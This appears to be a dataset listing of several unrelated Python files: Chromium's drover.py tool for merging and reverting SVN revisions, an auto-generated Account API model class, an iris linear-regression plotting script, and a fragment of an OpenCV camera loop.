# interpreter.set_tensor(input_details[0]['index'], resized)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# cap.release()
# cv2.destroyAllWindows()
|
python
|
#!/usr/bin/env python2
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import optparse
import os
import re
import sys
import urlparse
import gclient_utils
import subprocess2
USAGE = """
WARNING: Please use this tool in an empty directory
(or at least one that you don't mind clobbering.)
REQUIRES: SVN 1.5+
NOTE: NO NEED TO CHECKOUT ANYTHING IN ADVANCE OF USING THIS TOOL.
Valid parameters:
[Merge from trunk to branch]
--merge <revision> --branch <branch_num>
Example: %(app)s --merge 12345 --branch 187
[Merge from trunk to local copy]
--merge <revision> --local
Example: %(app)s --merge 12345 --local
[Merge from branch to branch]
--merge <revision> --sbranch <branch_num> --branch <branch_num>
Example: %(app)s --merge 12345 --sbranch 248 --branch 249
[Revert from trunk]
--revert <revision>
Example: %(app)s --revert 12345
[Revert from branch]
--revert <revision> --branch <branch_num>
Example: %(app)s --revert 12345 --branch 187
"""
export_map_ = None
files_info_ = None
delete_map_ = None
file_pattern_ = r"[ ]+([MADUC])[ ]+/((?:trunk|branches/.*?)/src(.*)/(.*))"
depot_tools_dir_ = os.path.dirname(os.path.abspath(__file__))
def runGcl(subcommand):
gcl_path = os.path.join(depot_tools_dir_, "gcl")
if not os.path.exists(gcl_path):
print "WARNING: gcl not found beside drover.py. Using system gcl instead..."
gcl_path = 'gcl'
command = "%s %s" % (gcl_path, subcommand)
return os.system(command)
def gclUpload(revision, author):
command = ("upload " + str(revision) +
" --send_mail --no_presubmit --reviewers=" + author)
return runGcl(command)
def getSVNInfo(url, revision):
info = {}
svn_info = subprocess2.capture(
['svn', 'info', '--non-interactive', '%s@%s' % (url, revision)],
stderr=subprocess2.VOID).splitlines()
for line in svn_info:
match = re.search(r"(.*?):(.*)", line)
if match:
info[match.group(1).strip()] = match.group(2).strip()
return info
def isSVNDirty():
svn_status = subprocess2.check_output(['svn', 'status']).splitlines()
for line in svn_status:
match = re.search(r"^[^X?]", line)
if match:
return True
return False
def getAuthor(url, revision):
info = getSVNInfo(url, revision)
if (info.has_key("Last Changed Author")):
return info["Last Changed Author"]
return None
def isSVNFile(url, revision):
info = getSVNInfo(url, revision)
if (info.has_key("Node Kind")):
if (info["Node Kind"] == "file"):
return True
return False
def isSVNDirectory(url, revision):
info = getSVNInfo(url, revision)
if (info.has_key("Node Kind")):
if (info["Node Kind"] == "directory"):
return True
return False
def inCheckoutRoot(path):
info = getSVNInfo(path, "HEAD")
if (not info.has_key("Repository Root")):
return False
repo_root = info["Repository Root"]
info = getSVNInfo(os.path.dirname(os.path.abspath(path)), "HEAD")
if (info.get("Repository Root", None) != repo_root):
return True
return False
def getRevisionLog(url, revision):
"""Takes an svn url and gets the associated revision."""
svn_log = subprocess2.check_output(
['svn', 'log', url, '-r', str(revision)],
universal_newlines=True).splitlines(True)
# Don't include the header lines and the trailing "---..." line.
return ''.join(svn_log[3:-1])
def getSVNVersionInfo():
"""Extract version information from SVN"""
svn_info = subprocess2.check_output(['svn', '--version']).splitlines()
info = {}
for line in svn_info:
match = re.search(r"svn, version ((\d+)\.(\d+)\.(\d+))", line)
if match:
info['version'] = match.group(1)
info['major'] = int(match.group(2))
info['minor'] = int(match.group(3))
info['patch'] = int(match.group(4))
return info
return None
def isMinimumSVNVersion(major, minor, patch=0):
"""Test for minimum SVN version"""
return _isMinimumSVNVersion(getSVNVersionInfo(), major, minor, patch)
def _isMinimumSVNVersion(version, major, minor, patch=0):
"""Test for minimum SVN version, internal method"""
if not version:
return False
if (version['major'] > major):
return True
elif (version['major'] < major):
return False
if (version['minor'] > minor):
return True
elif (version['minor'] < minor):
return False
if (version['patch'] >= patch):
return True
else:
return False
def checkoutRevision(url, revision, branch_url, revert=False, pop=True):
files_info = getFileInfo(url, revision)
paths = getBestMergePaths2(files_info, revision)
export_map = getBestExportPathsMap2(files_info, revision)
command = 'svn checkout -N ' + branch_url
print command
os.system(command)
match = re.search(r"^[a-z]+://.*/(.*)", branch_url)
if match:
os.chdir(match.group(1))
# This line is extremely important due to the way svn behaves in the
# set-depths action. If parents aren't handled before children, the child
# directories get clobbered and the merge step fails.
paths.sort()
# Checkout the directories that already exist
for path in paths:
if (export_map.has_key(path) and not revert):
print "Exclude new directory " + path
continue
subpaths = path.split('/')
#In the normal case, where no url override is specified and it's just
# chromium source, it's necessary to remove the 'trunk' from the filepath,
# since in the checkout we include 'trunk' or 'branch/\d+'.
#
# However, when a url is specified we want to preserve that because it's
# a part of the filepath and necessary for path operations on svn (because
# frankly, we are checking out the correct top level, and not hacking it).
if pop:
subpaths.pop(0)
base = ''
for subpath in subpaths:
base += '/' + subpath
# This logic ensures that you don't empty out any directories
if not os.path.exists("." + base):
command = ('svn update --depth empty ' + "." + base)
print command
os.system(command)
if (revert):
files = getAllFilesInRevision(files_info)
else:
files = getExistingFilesInRevision(files_info)
for f in files:
# Prevent the tool from clobbering the src directory
if (f == ""):
continue
command = ('svn up ".' + f + '"')
print command
os.system(command)
def mergeRevision(url, revision):
paths = getBestMergePaths(url, revision)
export_map = getBestExportPathsMap(url, revision)
for path in paths:
if export_map.has_key(path):
continue
command = ('svn merge -N -r ' + str(revision-1) + ":" + str(revision) + " ")
command += " --ignore-ancestry "
command += " -x --ignore-eol-style "
command += url + path + "@" + str(revision) + " ." + path
print command
os.system(command)
def exportRevision(url, revision):
paths = getBestExportPathsMap(url, revision).keys()
paths.sort()
for path in paths:
command = ('svn export -N ' + url + path + "@" + str(revision) + " ." +
path)
print command
os.system(command)
command = 'svn add .' + path
print command
os.system(command)
def deleteRevision(url, revision):
paths = getBestDeletePathsMap(url, revision).keys()
paths.sort()
paths.reverse()
for path in paths:
command = "svn delete ." + path
print command
os.system(command)
def revertExportRevision(url, revision):
paths = getBestExportPathsMap(url, revision).keys()
paths.sort()
paths.reverse()
for path in paths:
command = "svn delete ." + path
print command
os.system(command)
def revertRevision(url, revision):
command = ('svn merge --ignore-ancestry -c -%d %s .' % (revision, url))
print command
os.system(command)
def getFileInfo(url, revision):
global files_info_
if (files_info_ != None):
return files_info_
svn_log = subprocess2.check_output(
['svn', 'log', url, '-r', str(revision), '-v']).splitlines()
info = []
for line in svn_log:
# A workaround to dump the (from .*) stuff, regex not so friendly in the 2nd
# pass...
match = re.search(r"(.*) \(from.*\)", line)
if match:
line = match.group(1)
match = re.search(file_pattern_, line)
if match:
info.append([match.group(1).strip(), match.group(2).strip(),
match.group(3).strip(),match.group(4).strip()])
files_info_ = info
return info
def getBestMergePaths(url, revision):
"""Takes an svn url and gets the associated revision."""
return getBestMergePaths2(getFileInfo(url, revision), revision)
def getBestMergePaths2(files_info, revision):
"""Takes an svn url and gets the associated revision."""
return list(set([f[2] for f in files_info]))
def getBestExportPathsMap(url, revision):
return getBestExportPathsMap2(getFileInfo(url, revision), revision)
def getBestExportPathsMap2(files_info, revision):
"""Takes an svn url and gets the associated revision."""
global export_map_
if export_map_:
return export_map_
result = {}
for file_info in files_info:
if (file_info[0] == "A"):
if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
revision)):
result[file_info[2] + "/" + file_info[3]] = ""
export_map_ = result
return result
def getBestDeletePathsMap(url, revision):
return getBestDeletePathsMap2(getFileInfo(url, revision), revision)
def getBestDeletePathsMap2(files_info, revision):
"""Takes an svn url and gets the associated revision."""
global delete_map_
if delete_map_:
return delete_map_
result = {}
for file_info in files_info:
if (file_info[0] == "D"):
if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
revision)):
result[file_info[2] + "/" + file_info[3]] = ""
delete_map_ = result
return result
def getExistingFilesInRevision(files_info):
"""Checks for existing files in the revision.
Anything that's A will require special treatment (either a merge or an
export + add)
"""
return ['%s/%s' % (f[2], f[3]) for f in files_info if f[0] != 'A']
def getAllFilesInRevision(files_info):
"""Checks for existing files in the revision.
Anything that's A will require special treatment (either a merge or an
export + add)
"""
return ['%s/%s' % (f[2], f[3]) for f in files_info]
def getSVNAuthInfo(folder=None):
"""Fetches SVN authorization information in the subversion auth folder and
returns it as a dictionary of dictionaries."""
if not folder:
if sys.platform == 'win32':
folder = '%%APPDATA%\\Subversion\\auth'
else:
folder = '~/.subversion/auth'
folder = os.path.expandvars(os.path.expanduser(folder))
svn_simple_folder = os.path.join(folder, 'svn.simple')
results = {}
try:
for auth_file in os.listdir(svn_simple_folder):
# Read the SVN auth file, convert it into a dictionary, and store it.
results[auth_file] = dict(re.findall(r'K [0-9]+\n(.*)\nV [0-9]+\n(.*)\n',
open(os.path.join(svn_simple_folder, auth_file)).read()))
except Exception as _:
pass
return results
def getCurrentSVNUsers(url):
"""Tries to fetch the current SVN in the current checkout by scanning the
SVN authorization folder for a match with the current SVN URL."""
netloc = urlparse.urlparse(url)[1]
auth_infos = getSVNAuthInfo()
results = []
for _, auth_info in auth_infos.iteritems():
if ('svn:realmstring' in auth_info
and netloc in auth_info['svn:realmstring']):
username = auth_info['username']
results.append(username)
if 'google.com' in username:
results.append(username.replace('google.com', 'chromium.org'))
return results
def prompt(question):
while True:
print question + " [y|n]:",
answer = sys.stdin.readline()
if answer.lower().startswith('n'):
return False
elif answer.lower().startswith('y'):
return True
def text_prompt(question, default):
print question + " [" + default + "]:"
answer = sys.stdin.readline()
if answer.strip() == "":
return default
return answer
def drover(options, args):
revision = options.revert or options.merge
# Initialize some variables used below. They can be overwritten by
# the drover.properties file.
BASE_URL = "svn://svn.chromium.org/chrome"
REVERT_ALT_URLS = ['svn://svn.chromium.org/blink',
'svn://svn.chromium.org/chrome-internal',
'svn://svn.chromium.org/native_client']
TRUNK_URL = BASE_URL + "/trunk/src"
BRANCH_URL = BASE_URL + "/branches/$branch/src"
SKIP_CHECK_WORKING = True
PROMPT_FOR_AUTHOR = False
NO_ALT_URLS = options.no_alt_urls
DEFAULT_WORKING = "drover_" + str(revision)
if options.branch:
DEFAULT_WORKING += ("_" + options.branch)
if not isMinimumSVNVersion(1, 5):
print "You need to use at least SVN version 1.5.x"
return 1
# Override the default properties if there is a drover.properties file.
global file_pattern_
if os.path.exists("drover.properties"):
print 'Using options from %s' % os.path.join(
os.getcwd(), 'drover.properties')
FILE_PATTERN = file_pattern_
f = open("drover.properties")
exec(f)
f.close()
if FILE_PATTERN:
file_pattern_ = FILE_PATTERN
NO_ALT_URLS = True
if options.revert and options.branch:
print 'Note: --branch is usually not needed for reverts.'
url = BRANCH_URL.replace("$branch", options.branch)
elif options.merge and options.sbranch:
url = BRANCH_URL.replace("$branch", options.sbranch)
elif options.revert:
url = options.url or BASE_URL
file_pattern_ = r"[ ]+([MADUC])[ ]+((/.*)/(.*))"
else:
url = TRUNK_URL
working = options.workdir or DEFAULT_WORKING
if options.local:
working = os.getcwd()
if not inCheckoutRoot(working):
print "'%s' appears not to be the root of a working copy" % working
return 1
if (isSVNDirty() and not
prompt("Working copy contains uncommitted files. Continue?")):
return 1
if options.revert and not NO_ALT_URLS and not options.url:
for cur_url in [url] + REVERT_ALT_URLS:
try:
commit_date_str = getSVNInfo(
cur_url, options.revert).get('Last Changed Date', 'x').split()[0]
commit_date = datetime.datetime.strptime(commit_date_str, '%Y-%m-%d')
if (datetime.datetime.now() - commit_date).days < 180:
if cur_url != url:
print 'Guessing svn repo: %s.' % cur_url,
print 'Use --no-alt-urls to disable heuristic.'
url = cur_url
break
except ValueError:
pass
command = 'svn log ' + url + " -r "+str(revision) + " -v"
os.system(command)
if not (options.revertbot or prompt("Is this the correct revision?")):
return 0
if (os.path.exists(working)) and not options.local:
if not (options.revertbot or SKIP_CHECK_WORKING or
prompt("Working directory: '%s' already exists, clobber?" % working)):
return 0
gclient_utils.rmtree(working)
if not options.local:
os.makedirs(working)
os.chdir(working)
if options.merge:
action = "Merge"
if not options.local:
branch_url = BRANCH_URL.replace("$branch", options.branch)
# Checkout everything but stuff that got added into a new dir
checkoutRevision(url, revision, branch_url)
# Merge everything that changed
mergeRevision(url, revision)
# "Export" files that were added from the source and add them to branch
exportRevision(url, revision)
# Delete directories that were deleted (file deletes are handled in the
# merge).
deleteRevision(url, revision)
elif options.revert:
action = "Revert"
pop_em = not options.url
checkoutRevision(url, revision, url, True, pop_em)
revertRevision(url, revision)
revertExportRevision(url, revision)
# Check the base url so we actually find the author who made the change
if options.auditor:
author = options.auditor
else:
author = getAuthor(url, revision)
if not author:
author = getAuthor(TRUNK_URL, revision)
# Check that the author of the CL is different than the user making
# the revert. If they're the same, then we'll want to prompt the user
# for a different reviewer to TBR.
current_users = getCurrentSVNUsers(BASE_URL)
is_self_revert = options.revert and author in current_users
filename = str(revision)+".txt"
out = open(filename,"w")
drover_title = '%s %s' % (action, revision)
revision_log = getRevisionLog(url, revision).splitlines()
if revision_log:
commit_title = revision_log[0]
# Limit title to 68 chars so git log --oneline is <80 chars.
max_commit_title = 68 - (len(drover_title) + 3)
if len(commit_title) > max_commit_title:
commit_title = commit_title[:max_commit_title-3] + '...'
drover_title += ' "%s"' % commit_title
out.write(drover_title + '\n\n')
for line in revision_log:
out.write('> %s\n' % line)
if author:
out.write("\nTBR=" + author)
out.close()
change_cmd = 'change ' + str(revision) + " " + filename
if options.revertbot:
if sys.platform == 'win32':
os.environ['SVN_EDITOR'] = 'cmd.exe /c exit'
else:
os.environ['SVN_EDITOR'] = 'true'
runGcl(change_cmd)
os.unlink(filename)
if options.local:
return 0
print author
print revision
print ("gcl upload " + str(revision) +
" --send_mail --no_presubmit --reviewers=" + author)
if options.revertbot or prompt("Would you like to upload?"):
if PROMPT_FOR_AUTHOR or is_self_revert:
author = text_prompt("Enter new author or press enter to accept default",
author)
if options.revertbot and options.revertbot_reviewers:
author += ","
author += options.revertbot_reviewers
gclUpload(revision, author)
else:
print "Deleting the changelist."
print "gcl delete " + str(revision)
runGcl("delete " + str(revision))
return 0
# We commit if the reverbot is set to commit automatically, or if this is
# not the revertbot and the user agrees.
if options.revertbot_commit or (not options.revertbot and
prompt("Would you like to commit?")):
print "gcl commit " + str(revision) + " --no_presubmit --force"
return runGcl("commit " + str(revision) + " --no_presubmit --force")
else:
return 0
def main():
option_parser = optparse.OptionParser(usage=USAGE % {"app": sys.argv[0]})
option_parser.add_option('-m', '--merge', type="int",
help='Revision to merge from trunk to branch')
option_parser.add_option('-b', '--branch',
help='Branch to revert or merge from')
option_parser.add_option('-l', '--local', action='store_true',
help='Local working copy to merge to')
option_parser.add_option('-s', '--sbranch',
help='Source branch for merge')
option_parser.add_option('-r', '--revert', type="int",
help='Revision to revert')
option_parser.add_option('-w', '--workdir',
help='subdir to use for the revert')
option_parser.add_option('-u', '--url',
help='svn url to use for the revert')
option_parser.add_option('-a', '--auditor',
help='overrides the author for reviewer')
option_parser.add_option('--revertbot', action='store_true',
default=False)
option_parser.add_option('--no-alt-urls', action='store_true',
help='Disable heuristics used to determine svn url')
option_parser.add_option('--revertbot-commit', action='store_true',
default=False)
option_parser.add_option('--revertbot-reviewers')
options, args = option_parser.parse_args()
if not options.merge and not options.revert:
option_parser.error("You need at least --merge or --revert")
return 1
if options.merge and not (options.branch or options.local):
option_parser.error("--merge requires --branch or --local")
return 1
if options.local and (options.revert or options.branch):
option_parser.error("--local cannot be used with --revert or --branch")
return 1
return drover(options, args)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
python
|
# -*- coding: utf-8 -*-
"""
MagicTelecomAPILib.Models.Account
This file was automatically generated by APIMATIC v2.0 on 06/22/2016
"""
from MagicTelecomAPILib.APIHelper import APIHelper
class Account(object):
"""Implementation of the 'Account' model.
TODO: type model description here.
Attributes:
number (string): TODO: type description here.
roles (list of string): TODO: type description here.
email (string): TODO: type description here.
contact_number (string): TODO: type description here.
firstname (string): TODO: type description here.
lastname (string): TODO: type description here.
"""
def __init__(self,
**kwargs):
"""Constructor for the Account class
Args:
**kwargs: Keyword Arguments in order to initialise the
object. Any of the attributes in this object are able to
be set through the **kwargs of the constructor. The values
that can be supplied and their types are as follows::
number -- string -- Sets the attribute number
roles -- list of string -- Sets the attribute roles
email -- string -- Sets the attribute email
contact_number -- string -- Sets the attribute contact_number
firstname -- string -- Sets the attribute firstname
lastname -- string -- Sets the attribute lastname
"""
# Set all of the parameters to their default values
self.number = None
self.roles = None
self.email = None
self.contact_number = None
self.firstname = None
self.lastname = None
# Create a mapping from API property names to Model property names
replace_names = {
"number": "number",
"roles": "roles",
"email": "email",
"contact_number": "contact_number",
"firstname": "firstname",
"lastname": "lastname",
}
# Parse all of the Key-Value arguments
if kwargs is not None:
for key in kwargs:
# Only add arguments that are actually part of this object
if key in replace_names:
setattr(self, replace_names[key], kwargs[key])
def resolve_names(self):
"""Creates a dictionary representation of this object.
This method converts an object to a dictionary that represents the
format that the model should be in when passed into an API Request.
Because of this, the generated dictionary may have different
property names to that of the model itself.
Returns:
dict: The dictionary representing the object.
"""
# Create a mapping from Model property names to API property names
replace_names = {
"number": "number",
"roles": "roles",
"email": "email",
"contact_number": "contact_number",
"firstname": "firstname",
"lastname": "lastname",
}
retval = dict()
return APIHelper.resolve_names(self, replace_names, retval)
|
python
|
# Linear regression on iris dataset
import numpy as np
import matplotlib.pyplot as plt
import os
figdir = os.path.join(os.environ["PYPROBML"], "figures")
def save_fig(fname): plt.savefig(os.path.join(figdir, fname))
import seaborn as sns
from sklearn.linear_model import LinearRegression
from sklearn import datasets
iris = datasets.load_iris()
xidx = 2
ys = [1, 3]
for yidx in ys:
X = iris.data[:, xidx:xidx+1] # we only take the first feature
Y = iris.data[:, yidx:yidx+1]
linreg = LinearRegression()
linreg.fit(X, Y)
xs = np.arange(np.min(X), np.max(X), 0.1).reshape(-1,1)
yhat = linreg.predict(xs)
plt.plot(xs, yhat)
sns.scatterplot(x=X[:,0], y=Y[:,0])
plt.xlabel(iris.feature_names[xidx])
plt.ylabel(iris.feature_names[yidx])
plt.xlim(np.min(X), np.max(X))
plt.ylim(np.min(Y), np.max(Y))
fname = "iris-linreg{}".format(yidx)
save_fig(fname)
plt.show()
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.